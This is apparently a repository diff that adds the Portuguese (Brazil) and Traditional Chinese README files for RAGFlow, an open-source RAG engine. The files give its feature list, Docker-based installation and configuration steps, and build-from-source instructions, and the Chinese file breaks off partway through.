 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="seguir no X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Badge Estático" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Última%20Relese" alt="Última Versão">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="licença">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Documentação</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ <details open>
44
+ <summary></b>📕 Índice</b></summary>
45
+
46
+ - 💡 [O que é o RAGFlow?](#-o-que-é-o-ragflow)
47
+ - 🎮 [Demo](#-demo)
48
+ - 📌 [Últimas Atualizações](#-últimas-atualizações)
49
+ - 🌟 [Principais Funcionalidades](#-principais-funcionalidades)
50
+ - 🔎 [Arquitetura do Sistema](#-arquitetura-do-sistema)
51
+ - 🎬 [Primeiros Passos](#-primeiros-passos)
52
+ - 🔧 [Configurações](#-configurações)
53
+ - 🔧 [Construir uma imagem docker sem incorporar modelos](#-construir-uma-imagem-docker-sem-incorporar-modelos)
54
+ - 🔧 [Construir uma imagem docker incluindo modelos](#-construir-uma-imagem-docker-incluindo-modelos)
55
+ - 🔨 [Lançar serviço a partir do código-fonte para desenvolvimento](#-lançar-serviço-a-partir-do-código-fonte-para-desenvolvimento)
56
+ - 📚 [Documentação](#-documentação)
57
+ - 📜 [Roadmap](#-roadmap)
58
+ - 🏄 [Comunidade](#-comunidade)
59
+ - 🙌 [Contribuindo](#-contribuindo)
60
+
61
+ </details>
62
+
63
+ ## 💡 O que é o RAGFlow?
64
+
65
+ [RAGFlow](https://ragflow.io/) é um mecanismo RAG (Geração Aumentada por Recuperação) de código aberto baseado em entendimento profundo de documentos. Ele oferece um fluxo de trabalho RAG simplificado para empresas de qualquer porte, combinando LLMs (Modelos de Linguagem de Grande Escala) para fornecer capacidades de perguntas e respostas verídicas, respaldadas por citações bem fundamentadas de diversos dados complexos formatados.
66
+
67
+ ## 🎮 Demo
68
+
69
+ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
70
+
71
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
72
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
73
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
74
+ </div>
75
+
76
+ ## 🔥 Últimas Atualizações
77
+
78
+ - 05-02-2025 Atualiza a lista de modelos de 'SILICONFLOW' e adiciona suporte para Deepseek-R1/DeepSeek-V3.
79
+ - 26-01-2025 Otimize a extração e aplicação de gráficos de conhecimento e forneça uma variedade de opções de configuração.
80
+ - 18-12-2024 Atualiza o modelo de Análise de Layout de Documentos no Deepdoc.
81
+ - 04-12-2024 Adiciona suporte para pontuação de pagerank na base de conhecimento.
82
+ - 22-11-2024 Adiciona mais variáveis para o Agente.
83
+ - 01-11-2024 Adiciona extração de palavras-chave e geração de perguntas relacionadas aos blocos analisados para melhorar a precisão da recuperação.
84
+ - 22-08-2024 Suporta conversão de texto para comandos SQL via RAG.
85
+
86
+ ## 🎉 Fique Ligado
87
+
88
+ ⭐️ Dê uma estrela no nosso repositório para se manter atualizado com novas funcionalidades e melhorias empolgantes! Receba notificações instantâneas sobre novos lançamentos! 🌟
89
+
90
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
91
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
92
+ </div>
93
+
94
+ ## 🌟 Principais Funcionalidades
95
+
96
+ ### 🍭 **"Qualidade entra, qualidade sai"**
97
+
98
+ - Extração de conhecimento baseada em [entendimento profundo de documentos](./deepdoc/README.md) a partir de dados não estruturados com formatos complicados.
99
+ - Encontra a "agulha no palheiro de dados" de literalmente tokens ilimitados.
100
+
101
+ ### 🍱 **Fragmentação baseada em templates**
102
+
103
+ - Inteligente e explicável.
104
+ - Muitas opções de templates para escolher.
105
+
106
+ ### 🌱 **Citações fundamentadas com menos alucinações**
107
+
108
+ - Visualização da fragmentação de texto para permitir intervenção humana.
109
+ - Visualização rápida das referências chave e citações rastreáveis para apoiar respostas fundamentadas.
110
+
111
+ ### 🍔 **Compatibilidade com fontes de dados heterogêneas**
112
+
113
+ - Suporta Word, apresentações, excel, txt, imagens, cópias digitalizadas, dados estruturados, páginas da web e mais.
114
+
115
+ ### 🛀 **Fluxo de trabalho RAG automatizado e sem esforço**
116
+
117
+ - Orquestração RAG simplificada voltada tanto para negócios pessoais quanto grandes empresas.
118
+ - Modelos LLM e de incorporação configuráveis.
119
+ - Múltiplas recuperações emparelhadas com reclassificação fundida.
120
+ - APIs intuitivas para integração sem problemas com os negócios.
121
+
122
+ ## 🔎 Arquitetura do Sistema
123
+
124
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
125
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
126
+ </div>
127
+
128
+ ## 🎬 Primeiros Passos
129
+
130
+ ### 📝 Pré-requisitos
131
+
132
+ - CPU >= 4 núcleos
133
+ - RAM >= 16 GB
134
+ - Disco >= 50 GB
135
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
136
+ > Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
137
+
138
+ ### 🚀 Iniciar o servidor
139
+
140
+ 1. Certifique-se de que `vm.max_map_count` >= 262144:
141
+
142
+ > Para verificar o valor de `vm.max_map_count`:
143
+ >
144
+ > ```bash
145
+ > $ sysctl vm.max_map_count
146
+ > ```
147
+ >
148
+ > Se necessário, redefina `vm.max_map_count` para um valor de pelo menos 262144:
149
+ >
150
+ > ```bash
151
+ > # Neste caso, defina para 262144:
152
+ > $ sudo sysctl -w vm.max_map_count=262144
153
+ > ```
154
+ >
155
+ > Essa mudança será resetada após a reinicialização do sistema. Para garantir que a alteração permaneça permanente, adicione ou atualize o valor de `vm.max_map_count` em **/etc/sysctl.conf**:
156
+ >
157
+ > ```bash
158
+ > vm.max_map_count=262144
159
+ > ```
160
+
161
+ 2. Clone o repositório:
162
+
163
+ ```bash
164
+ $ git clone https://github.com/infiniflow/ragflow.git
165
+ ```
166
+
167
+ 3. Inicie o servidor usando as imagens Docker pré-compiladas:
168
+
169
+ > O comando abaixo baixa a edição `v0.16.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.16.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` para a edição completa `v0.16.0`.
170
+
171
+ ```bash
172
+ $ cd ragflow
173
+ $ docker compose -f docker/docker-compose.yml up -d
174
+ ```
175
+
176
+ | Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável? |
177
+ | --------------------- | ---------------------- | ------------------------------- | ------------------------ |
178
+ | v0.16.0 | ~9 | :heavy_check_mark: | Lançamento estável |
179
+ | v0.16.0-slim | ~2 | ❌ | Lançamento estável |
180
+ | nightly | ~9 | :heavy_check_mark: | _Instável_ build noturno |
181
+ | nightly-slim | ~2 | ❌ | _Instável_ build noturno |
182
+
183
+ 4. Verifique o status do servidor após tê-lo iniciado:
184
+
185
+ ```bash
186
+ $ docker logs -f ragflow-server
187
+ ```
188
+
189
+ _O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
190
+
191
+ ```bash
192
+ ____ ___ ______ ______ __
193
+ / __ \ / | / ____// ____// /____ _ __
194
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
195
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
196
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
197
+
198
+ * Rodando em todos os endereços (0.0.0.0)
199
+ * Rodando em http://127.0.0.1:9380
200
+ * Rodando em http://x.x.x.x:9380
201
+ INFO:werkzeug:Pressione CTRL+C para sair
202
+ ```
203
+
204
+ > Se você pular essa etapa de confirmação e acessar diretamente o RAGFlow, seu navegador pode exibir um erro `network anormal`, pois, nesse momento, seu RAGFlow pode não estar totalmente inicializado.
205
+
206
+ 5. No seu navegador, insira o endereço IP do seu servidor e faça login no RAGFlow.
207
+
208
+ > Com as configurações padrão, você só precisa digitar `http://IP_DO_SEU_MÁQUINA` (**sem** o número da porta), pois a porta HTTP padrão `80` pode ser omitida ao usar as configurações padrão.
209
+
210
+ 6. Em [service_conf.yaml.template](./docker/service_conf.yaml.template), selecione a fábrica LLM desejada em `user_default_llm` e atualize o campo `API_KEY` com a chave de API correspondente.
211
+
212
+ > Consulte [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) para mais informações.
213
+
214
+ _O show está no ar!_
215
+
216
+ ## 🔧 Configurações
217
+
218
+ Quando se trata de configurações do sistema, você precisará gerenciar os seguintes arquivos:
219
+
220
+ - [.env](./docker/.env): Contém as configurações fundamentais para o sistema, como `SVR_HTTP_PORT`, `MYSQL_PASSWORD` e `MINIO_PASSWORD`.
221
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): Configura os serviços de back-end. As variáveis de ambiente neste arquivo serão automaticamente preenchidas quando o contêiner Docker for iniciado. Quaisquer variáveis de ambiente definidas dentro do contêiner Docker estarão disponíveis para uso, permitindo personalizar o comportamento do serviço com base no ambiente de implantação.
222
+ - [docker-compose.yml](./docker/docker-compose.yml): O sistema depende do [docker-compose.yml](./docker/docker-compose.yml) para iniciar.
223
+
224
+ > O arquivo [./docker/README](./docker/README.md) fornece uma descrição detalhada das configurações do ambiente e dos serviços, que podem ser usadas como `${ENV_VARS}` no arquivo [service_conf.yaml.template](./docker/service_conf.yaml.template).
225
+
226
+ Para atualizar a porta HTTP de serviço padrão (80), vá até [docker-compose.yml](./docker/docker-compose.yml) e altere `80:80` para `<SUA_PORTA_DE_SERVIÇO>:80`.
227
+
228
+ Atualizações nas configurações acima exigem um reinício de todos os contêineres para que tenham efeito:
229
+
230
+ > ```bash
231
+ > $ docker compose -f docker/docker-compose.yml up -d
232
+ > ```
233
+
234
+ ### Mudar o mecanismo de documentos de Elasticsearch para Infinity
235
+
236
+ O RAGFlow usa o Elasticsearch por padrão para armazenar texto completo e vetores. Para mudar para o [Infinity](https://github.com/infiniflow/infinity/), siga estas etapas:
237
+
238
+ 1. Pare todos os contêineres em execução:
239
+
240
+ ```bash
241
+ $ docker compose -f docker/docker-compose.yml down -v
242
+ ```
243
+
244
+ 2. Defina `DOC_ENGINE` no **docker/.env** para `infinity`.
245
+
246
+ 3. Inicie os contêineres:
247
+
248
+ ```bash
249
+ $ docker compose -f docker/docker-compose.yml up -d
250
+ ```
251
+
252
+ > [!ATENÇÃO]
253
+ > A mudança para o Infinity em uma máquina Linux/arm64 ainda não é oficialmente suportada.
254
+
255
+ ## 🔧 Criar uma imagem Docker sem modelos de incorporação
256
+
257
+ Esta imagem tem cerca de 2 GB de tamanho e depende de serviços externos de LLM e incorporação.
258
+
259
+ ```bash
260
+ git clone https://github.com/infiniflow/ragflow.git
261
+ cd ragflow/
262
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
263
+ ```
264
+
265
+ ## 🔧 Criar uma imagem Docker incluindo modelos de incorporação
266
+
267
+ Esta imagem tem cerca de 9 GB de tamanho. Como inclui modelos de incorporação, depende apenas de serviços externos de LLM.
268
+
269
+ ```bash
270
+ git clone https://github.com/infiniflow/ragflow.git
271
+ cd ragflow/
272
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
273
+ ```
274
+
275
+ ## 🔨 Lançar o serviço a partir do código-fonte para desenvolvimento
276
+
277
+ 1. Instale o `uv`, ou pule esta etapa se ele já estiver instalado:
278
+
279
+ ```bash
280
+ pipx install uv
281
+ ```
282
+
283
+ 2. Clone o código-fonte e instale as dependências Python:
284
+
285
+ ```bash
286
+ git clone https://github.com/infiniflow/ragflow.git
287
+ cd ragflow/
288
+ uv sync --python 3.10 --all-extras # instala os módulos Python dependentes do RAGFlow
289
+ ```
290
+
291
+ 3. Inicie os serviços dependentes (MinIO, Elasticsearch, Redis e MySQL) usando Docker Compose:
292
+
293
+ ```bash
294
+ docker compose -f docker/docker-compose-base.yml up -d
295
+ ```
296
+
297
+ Adicione a seguinte linha ao arquivo `/etc/hosts` para resolver todos os hosts especificados em **docker/.env** para `127.0.0.1`:
298
+
299
+ ```
300
+ 127.0.0.1 es01 infinity mysql minio redis
301
+ ```
302
+
303
+ 4. Se não conseguir acessar o HuggingFace, defina a variável de ambiente `HF_ENDPOINT` para usar um site espelho:
304
+
305
+ ```bash
306
+ export HF_ENDPOINT=https://hf-mirror.com
307
+ ```
308
+
309
+ 5. Lance o serviço de back-end:
310
+
311
+ ```bash
312
+ source .venv/bin/activate
313
+ export PYTHONPATH=$(pwd)
314
+ bash docker/launch_backend_service.sh
315
+ ```
316
+
317
+ 6. Instale as dependências do front-end:
318
+
319
+ ```bash
320
+ cd web
321
+ npm install
322
+ ```
323
+
324
+ 7. Lance o serviço de front-end:
325
+
326
+ ```bash
327
+ npm run dev
328
+ ```
329
+
330
+ _O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
331
+
332
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
333
+
334
+ ## 📚 Documentação
335
+
336
+ - [Início rápido](https://ragflow.io/docs/dev/)
337
+ - [Guia do usuário](https://ragflow.io/docs/dev/category/guides)
338
+ - [Referências](https://ragflow.io/docs/dev/category/references)
339
+ - [FAQ](https://ragflow.io/docs/dev/faq)
340
+
341
+ ## 📜 Roadmap
342
+
343
+ Veja o [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214)
344
+
345
+ ## 🏄 Comunidade
346
+
347
+ - [Discord](https://discord.gg/4XxujFgUN7)
348
+ - [Twitter](https://twitter.com/infiniflowai)
349
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
350
+
351
+ ## 🙌 Contribuindo
352
+
353
+ O RAGFlow prospera por meio da colaboração de código aberto. Com esse espírito, abraçamos contribuições diversas da comunidade.
354
+ Se você deseja fazer parte, primeiro revise nossas [Diretrizes de Contribuição](./CONTRIBUTING.md).
ragflow-main/README_tzh.md ADDED
@@ -0,0 +1,353 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a> |
12
+ <a href="./README_id.md">Bahasa Indonesia</a> |
13
+ <a href="/README_pt_br.md">Português (Brasil)</a>
14
+ </p>
15
+
16
+ <p align="center">
17
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
18
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
19
+ </a>
20
+ <a href="https://demo.ragflow.io" target="_blank">
21
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
22
+ </a>
23
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
24
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
25
+ </a>
26
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
27
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
28
+ </a>
29
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
30
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
31
+ </a>
32
+ </p>
33
+
34
+ <h4 align="center">
35
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
36
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
37
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
38
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
39
+ <a href="https://demo.ragflow.io">Demo</a>
40
+ </h4>
41
+
42
+ ## 💡 RAGFlow 是什麼?
43
+
44
+ [RAGFlow](https://ragflow.io/) 是一款基於深度文件理解所建構的開源 RAG(Retrieval-Augmented Generation)引擎。 RAGFlow 可以為各種規模的企業及個人提供一套精簡的 RAG 工作流程,結合大語言模型(LLM)針對用戶各類不同的複雜格式數據提供可靠的問答以及有理有據的引用。
45
+
46
+ ## 🎮 Demo 試用
47
+
48
+ 請登入網址 [https://demo.ragflow.io](https://demo.ragflow.io) 試用 demo。
49
+
50
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
51
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
52
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
53
+ </div>
54
+
55
+ ## 🔥 近期更新
56
+
57
+ - 2025-02-05 更新「SILICONFLOW」的型號清單並新增 Deepseek-R1/DeepSeek-V3 的支援。
58
+ - 2025-01-26 最佳化知識圖譜的擷取與應用,提供了多種配置選擇。
59
+ - 2024-12-18 升級了 Deepdoc 的文檔佈局分析模型。
60
+ - 2024-12-04 支援知識庫的 Pagerank 分數。
61
+ - 2024-11-22 完善了 Agent 中的變數定義和使用。
62
+ - 2024-11-01 對解析後的 chunk 加入關鍵字抽取和相關問題產生以提高回想的準確度。
63
+ - 2024-08-22 支援用 RAG 技術實現從自然語言到 SQL 語句的轉換。
64
+
65
+ ## 🎉 關注項目
66
+
67
+ ⭐️ 點擊右上角的 Star 追蹤 RAGFlow,可以取得最新發布的即時通知 !🌟
68
+
69
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
70
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
71
+ </div>
72
+
73
+ ## 🌟 主要功能
74
+
75
+ ### 🍭 **"Quality in, quality out"**
76
+
77
+ - 基於[深度文件理解](./deepdoc/README.md),能夠從各類複雜格式的非結構化資料中提取真知灼見。
78
+ - 真正在無限上下文(token)的場景下快速完成大海撈針測試。
79
+
80
+ ### 🍱 **基於模板的文字切片**
81
+
82
+ - 不只是智能,更重要的是可控可解釋。
83
+ - 多種文字範本可供選擇
84
+
85
+ ### 🌱 **有理有據、最大程度降低幻覺(hallucination)**
86
+
87
+ - 文字切片過程視覺化,支援手動調整。
88
+ - 有理有據:答案提供關鍵引用的快照並支持追根溯源。
89
+
90
+ ### 🍔 **相容各類異質資料來源**
91
+
92
+ - 支援豐富的文件類型,包括 Word 文件、PPT、excel 表格、txt 檔案、圖片、PDF、影印件、影印件、結構化資料、網頁等。
93
+
94
+ ### 🛀 **全程無憂、自動化的 RAG 工作流程**
95
+
96
+ - 全面優化的 RAG 工作流程可以支援從個人應用乃至超大型企業的各類生態系統。
97
+ - 大語言模型 LLM 以及向量模型皆支援配置。
98
+ - 基於多路召回、融合重排序。
99
+ - 提供易用的 API,可輕鬆整合到各類企業系統。
100
+
101
+ ## 🔎 系統架構
102
+
103
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
104
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
105
+ </div>
106
+
107
+ ## 🎬 快速開始
108
+
109
+ ### 📝 前提條件
110
+
111
+ - CPU >= 4 核
112
+ - RAM >= 16 GB
113
+ - Disk >= 50 GB
114
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
115
+ > 如果你並沒有在本機安裝 Docker(Windows、Mac���或 Linux), 可以參考文件 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安裝。
116
+
117
+ ### 🚀 啟動伺服器
118
+
119
+ 1. 確保 `vm.max_map_count` 不小於 262144:
120
+
121
+ > 如需確認 `vm.max_map_count` 的大小:
122
+ >
123
+ > ```bash
124
+ > $ sysctl vm.max_map_count
125
+ > ```
126
+ >
127
+ > 如果 `vm.max_map_count` 的值小於 262144,可以進行重設:
128
+ >
129
+ > ```bash
130
+ > # 這裡我們設為 262144:
131
+ > $ sudo sysctl -w vm.max_map_count=262144
132
+ > ```
133
+ >
134
+ > 你的改動會在下次系統重新啟動時被重置。如果希望做永久改動,還需要在 **/etc/sysctl.conf** 檔案裡把 `vm.max_map_count` 的值再相應更新一遍:
135
+ >
136
+ > ```bash
137
+ > vm.max_map_count=262144
138
+ > ```
139
+
140
+ 2. 克隆倉庫:
141
+
142
+ ```bash
143
+ $ git clone https://github.com/infiniflow/ragflow.git
144
+ ```
145
+
146
+ 3. 進入 **docker** 資料夾,利用事先編譯好的 Docker 映像啟動伺服器:
147
+
148
+ > 執行以下指令會自動下載 RAGFlow slim Docker 映像 `v0.16.0-slim`。請參考下表查看不同 Docker 發行版的說明。如需下載不同於 `v0.16.0-slim` 的 Docker 映像,請在執行 `docker compose` 啟動服務之前先更新 **docker/.env** 檔案內的 `RAGFLOW_IMAGE` 變數。例如,你可以透過設定 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` 來下載 RAGFlow 鏡像的 `v0.16.0` 完整發行版。
149
+
150
+ ```bash
151
+ $ cd ragflow
152
+ $ docker compose -f docker/docker-compose.yml up -d
153
+ ```
154
+
155
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
156
+ | ----------------- | --------------- | --------------------- | ------------------------ |
157
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
158
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
159
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
160
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
161
+
162
+ > [!TIP]
163
+ > 如果你遇到 Docker 映像檔拉不下來的問題,可以在 **docker/.env** 檔案內根據變數 `RAGFLOW_IMAGE` 的註解提示選擇華為雲或阿里雲的對應映像。
164
+ >
165
+ > - 華為雲鏡像名:`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
166
+ > - 阿里雲鏡像名:`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
167
+
168
+ 4. 伺服器啟動成功後再次確認伺服器狀態:
169
+
170
+ ```bash
171
+ $ docker logs -f ragflow-server
172
+ ```
173
+
174
+ _出現以下介面提示說明伺服器啟動成功:_
175
+
176
+ ```bash
177
+ ____ ___ ______ ______ __
178
+ / __ \ / | / ____// ____// /____ _ __
179
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
180
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
181
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
182
+
183
+ * Running on all addresses (0.0.0.0)
184
+ * Running on http://127.0.0.1:9380
185
+ * Running on http://x.x.x.x:9380
186
+ INFO:werkzeug:Press CTRL+C to quit
187
+ ```
188
+
189
+ > 如果您跳過這一步驟系統確認步驟就登入 RAGFlow,你的瀏覽器有可能會提示 `network anormal` 或 `網路異常`,因為 RAGFlow 可能並未完全啟動成功。
190
+
191
+ 5. 在你的瀏覽器中輸入你的伺服器對應的 IP 位址並登入 RAGFlow。
192
+ > 上面這個範例中,您只需輸入 http://IP_OF_YOUR_MACHINE 即可:未改動過設定則無需輸入連接埠(預設的 HTTP 服務連接埠 80)。
193
+ 6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案的 `user_default_llm` 欄位設定 LLM factory,並在 `API_KEY` 欄填入和你選擇的大模型相對應的 API key。
194
+
195
+ > 詳見 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
196
+
197
+ _好戲開始,接著奏樂接著舞! _
198
+
199
+ ## 🔧 系統配置
200
+
201
+ 系統配置涉及以下三份文件:
202
+
203
+ - [.env](./docker/.env):存放一些基本的系統環境變量,例如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
204
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template):設定各類別後台服務。
205
+ - [docker-compose.yml](./docker/docker-compose.yml): 系統依賴該檔案完成啟動。
206
+
207
+ 請務必確保 [.env](./docker/.env) 檔案中的變數設定與 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案中的設定保持一致!
208
+
209
+ 如果無法存取映像網站 hub.docker.com 或模型網站 huggingface.co,請依照 [.env](./docker/.env) 註解修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
210
+
211
+ > [./docker/README](./docker/README.md) 解釋了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的環境變數設定和服務配置。
212
+
213
+ 如需更新預設的 HTTP 服務連接埠(80), 可以在[docker-compose.yml](./docker/docker-compose.yml) 檔案中將配置`80:80` 改為`<YOUR_SERVING_PORT>:80` 。
214
+
215
+ > 所有系統配置都需要透過系統重新啟動生效:
216
+ >
217
+ > ```bash
218
+ > $ docker compose -f docker/docker-compose.yml up -d
219
+ > ```
220
+
221
+ ###把文檔引擎從 Elasticsearch 切換成為 Infinity
222
+
223
+ RAGFlow 預設使用 Elasticsearch 儲存文字和向量資料. 如果要切換為 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步驟進行:
224
+
225
+ 1. 停止所有容器運作:
226
+
227
+ ```bash
228
+ $ docker compose -f docker/docker-compose.yml down -v
229
+ ```
230
+
231
+ 2. 設定 **docker/.env** 目錄中的 `DOC_ENGINE` 為 `infinity`.
232
+
233
+ 3. 啟動容器:
234
+
235
+ ```bash
236
+ $ docker compose -f docker/docker-compose.yml up -d
237
+ ```
238
+
239
+ > [!WARNING]
240
+ > Infinity 目前官方並未正式支援在 Linux/arm64 架構下的機器上運行.
241
+
242
+ ## 🔧 原始碼編譯 Docker 映像(不含 embedding 模型)
243
+
244
+ 本 Docker 映像大小約 2 GB 左右並且依賴外部的大模型和 embedding 服務。
245
+
246
+ ```bash
247
+ git clone https://github.com/infiniflow/ragflow.git
248
+ cd ragflow/
249
+ docker build --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
250
+ ```
